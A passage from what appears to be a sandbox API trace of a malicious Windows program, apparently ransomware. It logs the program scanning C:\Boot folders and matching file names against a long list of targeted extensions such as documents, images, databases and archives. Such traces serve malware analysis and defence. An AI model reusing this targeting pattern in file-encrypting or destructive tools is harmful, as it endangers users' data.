lstrlenW (lpString=".ppm") returned 4 [0286.232] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".pps") returned 4 [0286.232] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".ppsm") returned 5 [0286.232] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.232] lstrlenW (lpString=".ppt") returned 4 [0286.232] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".pptm") returned 5 [0286.232] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.232] lstrlenW (lpString=".pptx") returned 5 [0286.232] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.232] lstrlenW (lpString=".prn") returned 4 [0286.232] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.232] lstrlenW (lpString=".ps") returned 3 [0286.232] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.232] lstrlenW (lpString=".psb") returned 4 [0286.233] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".psd") returned 4 [0286.233] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".pst") returned 4 [0286.233] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".ptx") returned 4 [0286.233] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".pub") returned 4 [0286.233] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".pwm") returned 4 [0286.233] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".pxr") returned 4 [0286.233] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".py") returned 3 [0286.233] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.233] lstrlenW (lpString=".qt") returned 3 [0286.233] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.233] lstrlenW (lpString=".r3d") returned 4 [0286.233] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".raf") returned 4 [0286.233] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.233] lstrlenW (lpString=".rar") returned 4 [0286.233] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.233] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.234] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.234] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.234] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.234] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0286.234] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.234] lstrlenW (lpString="C:\\Boot\\ja-JP") returned 13 [0286.234] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.235] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.235] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.235] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.235] lstrlenW (lpString=".1cd") returned 4 [0286.235] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.235] lstrlenW (lpString=".3ds") returned 4 [0286.235] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.235] lstrlenW (lpString=".3fr") returned 4 [0286.235] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.235] lstrlenW (lpString=".3g2") returned 4 [0286.235] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.235] lstrlenW (lpString=".3gp") returned 4 [0286.235] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.235] lstrlenW (lpString=".7z") returned 3 [0286.235] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.235] lstrlenW (lpString=".accda") returned 6 [0286.235] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.235] lstrlenW (lpString=".accdb") returned 6 [0286.235] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.235] lstrlenW (lpString=".accdc") returned 6 [0286.235] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.235] lstrlenW (lpString=".accde") returned 6 [0286.235] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.236] lstrlenW (lpString=".accdt") returned 6 [0286.236] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.236] lstrlenW (lpString=".accdw") returned 6 [0286.236] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.236] lstrlenW (lpString=".adb") returned 4 [0286.236] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".adp") returned 4 [0286.236] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai") returned 3 [0286.236] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.236] lstrlenW (lpString=".ai3") returned 4 [0286.236] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai4") returned 4 [0286.236] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai5") returned 4 [0286.236] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai6") returned 4 [0286.236] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai7") returned 4 [0286.236] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".ai8") returned 4 [0286.236] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".anim") returned 5 [0286.236] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.236] lstrlenW (lpString=".arw") returned 4 [0286.236] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.236] lstrlenW (lpString=".as") returned 3 [0286.236] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.237] lstrlenW (lpString=".asa") returned 4 [0286.237] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".asc") returned 4 [0286.237] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".ascx") returned 5 [0286.237] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.237] lstrlenW (lpString=".asm") returned 4 [0286.237] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".asmx") returned 5 [0286.237] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.237] lstrlenW (lpString=".asp") returned 4 [0286.237] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".aspx") returned 5 [0286.237] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.237] lstrlenW (lpString=".asr") returned 4 [0286.237] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".asx") returned 4 [0286.237] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".avi") returned 4 [0286.237] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".avs") returned 4 [0286.237] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".backup") returned 7 [0286.237] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.237] lstrlenW (lpString=".bak") returned 4 [0286.237] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".bay") returned 4 [0286.237] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.237] lstrlenW (lpString=".bd") returned 3 [0286.238] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.238] lstrlenW (lpString=".bin") returned 4 [0286.238] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".bmp") returned 4 [0286.238] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".bz2") returned 4 [0286.238] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".c") returned 2 [0286.238] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.238] lstrlenW (lpString=".cdr") returned 4 [0286.238] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".cer") returned 4 [0286.238] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".cf") returned 3 [0286.238] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.238] lstrlenW (lpString=".cfc") returned 4 [0286.238] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".cfm") returned 4 [0286.238] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".cfml") returned 5 [0286.238] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.238] lstrlenW (lpString=".cfu") returned 4 [0286.238] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".chm") returned 4 [0286.238] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".cin") returned 4 [0286.238] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.238] lstrlenW (lpString=".class") returned 6 [0286.239] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.239] lstrlenW (lpString=".clx") returned 4 [0286.239] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".config") returned 7 [0286.239] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.239] lstrlenW (lpString=".cpp") returned 4 [0286.239] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".cr2") returned 4 [0286.239] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".crt") returned 4 [0286.239] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".crw") returned 4 [0286.239] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".cs") returned 3 [0286.239] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.239] lstrlenW (lpString=".css") returned 4 [0286.239] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".csv") returned 4 [0286.239] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".cub") returned 4 [0286.239] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".dae") returned 4 [0286.239] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".dat") returned 4 [0286.239] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.239] lstrlenW (lpString=".db") returned 3 [0286.240] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.240] lstrlenW (lpString=".dbf") returned 4 [0286.240] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dbx") returned 4 [0286.240] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dc3") returned 4 [0286.240] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dcm") returned 4 [0286.240] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dcr") returned 4 [0286.240] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".der") returned 4 [0286.240] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dib") returned 4 [0286.240] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dic") returned 4 [0286.240] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".dif") returned 4 [0286.240] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".divx") returned 5 [0286.240] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.240] lstrlenW (lpString=".djvu") returned 5 [0286.240] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.240] lstrlenW (lpString=".dng") returned 4 [0286.240] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".doc") returned 4 [0286.240] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.240] lstrlenW (lpString=".docm") returned 5 [0286.240] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.240] lstrlenW (lpString=".docx") returned 5 [0286.241] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.241] lstrlenW (lpString=".dot") returned 4 [0286.241] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dotm") returned 5 [0286.241] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.241] lstrlenW (lpString=".dotx") returned 5 [0286.241] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.241] lstrlenW (lpString=".dpx") returned 4 [0286.241] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dqy") returned 4 [0286.241] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dsn") returned 4 [0286.241] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dt") returned 3 [0286.241] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.241] lstrlenW (lpString=".dtd") returned 4 [0286.241] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dwg") returned 4 [0286.241] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dwt") returned 4 [0286.241] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".dx") returned 3 [0286.241] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.241] lstrlenW (lpString=".dxf") returned 4 [0286.241] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".edml") returned 5 [0286.241] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.241] lstrlenW (lpString=".efd") returned 4 [0286.241] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.241] lstrlenW (lpString=".elf") returned 4 [0286.242] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".emf") returned 4 [0286.242] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".emz") returned 4 [0286.242] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".epf") returned 4 [0286.242] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".eps") returned 4 [0286.242] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".epsf") returned 5 [0286.242] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.242] lstrlenW (lpString=".epsp") returned 5 [0286.242] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.242] lstrlenW (lpString=".erf") returned 4 [0286.242] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".exr") returned 4 [0286.242] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".f4v") returned 4 [0286.242] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".fido") returned 5 [0286.242] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.242] lstrlenW (lpString=".flm") returned 4 [0286.242] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".flv") returned 4 [0286.242] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".frm") returned 4 [0286.242] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".fxg") returned 4 [0286.242] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".geo") returned 4 [0286.242] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.242] lstrlenW (lpString=".gif") returned 4 [0286.243] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".grs") returned 4 [0286.243] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".gz") returned 3 [0286.243] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.243] lstrlenW (lpString=".h") returned 2 [0286.243] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.243] lstrlenW (lpString=".hdr") returned 4 [0286.243] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".hpp") returned 4 [0286.243] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".hta") returned 4 [0286.243] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".htc") returned 4 [0286.243] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".htm") returned 4 [0286.243] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".html") returned 5 [0286.243] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.243] lstrlenW (lpString=".icb") returned 4 [0286.243] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".ics") returned 4 [0286.243] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".iff") returned 4 [0286.243] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.243] lstrlenW (lpString=".inc") returned 4 [0286.243] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".indd") returned 5 [0286.244] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.244] lstrlenW (lpString=".ini") returned 4 [0286.244] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".iqy") returned 4 [0286.244] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".j2c") returned 4 [0286.244] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".j2k") returned 4 [0286.244] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".java") returned 5 [0286.244] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.244] lstrlenW (lpString=".jp2") returned 4 [0286.244] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".jpc") returned 4 [0286.244] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".jpe") returned 4 [0286.244] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".jpeg") returned 5 [0286.244] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.244] lstrlenW (lpString=".jpf") returned 4 [0286.244] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".jpg") returned 4 [0286.244] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".jpx") returned 4 [0286.244] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".js") returned 3 [0286.244] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.244] lstrlenW (lpString=".jsf") returned 4 [0286.244] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.244] lstrlenW (lpString=".json") returned 5 [0286.245] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.245] lstrlenW (lpString=".jsp") returned 4 [0286.245] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".kdc") returned 4 [0286.245] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".kmz") returned 4 [0286.245] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".kwm") returned 4 [0286.245] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".lasso") returned 6 [0286.245] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.245] lstrlenW (lpString=".lbi") returned 4 [0286.245] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".lgf") returned 4 [0286.245] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".lgp") returned 4 [0286.245] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".log") returned 4 [0286.245] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".m1v") returned 4 [0286.245] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".m4a") returned 4 [0286.245] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".m4v") returned 4 [0286.245] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.245] lstrlenW (lpString=".max") returned 4 [0286.246] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".md") returned 3 [0286.246] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.246] lstrlenW (lpString=".mda") returned 4 [0286.246] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mdb") returned 4 [0286.246] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mde") returned 4 [0286.246] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mdf") returned 4 [0286.246] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mdw") returned 4 [0286.246] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mef") returned 4 [0286.246] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mft") returned 4 [0286.246] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mfw") returned 4 [0286.246] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mht") returned 4 [0286.246] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mhtml") returned 6 [0286.246] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.246] lstrlenW (lpString=".mka") returned 4 [0286.246] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.246] lstrlenW (lpString=".mkidx") returned 6 [0286.247] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.247] lstrlenW (lpString=".mkv") returned 4 [0286.247] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mos") returned 4 [0286.247] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mov") returned 4 [0286.247] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mp3") returned 4 [0286.247] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mp4") returned 4 [0286.247] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mpeg") returned 5 [0286.247] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.247] lstrlenW (lpString=".mpg") returned 4 [0286.247] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mpv") returned 4 [0286.247] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mrw") returned 4 [0286.247] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".msg") returned 4 [0286.247] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.247] lstrlenW (lpString=".mxl") returned 4 [0286.247] 